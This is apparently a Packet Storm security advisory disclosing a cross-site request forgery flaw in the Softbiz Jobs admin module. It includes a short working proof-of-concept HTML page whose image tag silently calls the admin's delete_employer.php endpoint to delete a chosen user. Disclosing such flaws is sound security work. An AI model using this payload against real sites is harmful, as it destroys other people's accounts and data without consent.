Softbiz Jobs suffers from a cross site request forgery vulnerability.
fc1d87799052dcc5aa9cbfc7263e61cbbe44ee69f2b17ebd4e1e6a9015fab702
=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Download https://www.softbizscripts.com/
# Script softbizscripts
# URL https://demos1.softbiz.com/scripts/seojobs/admin/
# Proof of concept
Script to delete the registered user through Cross Site request forgery
...................................................................................................................
<html>
<body>
<img src=https://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
</body>
</html>
...................................................................................................................
Example-
...................................................................................................................
<html>
<body>
<img src=https://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20 />
</body>
</html>
...................................................................................................................
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed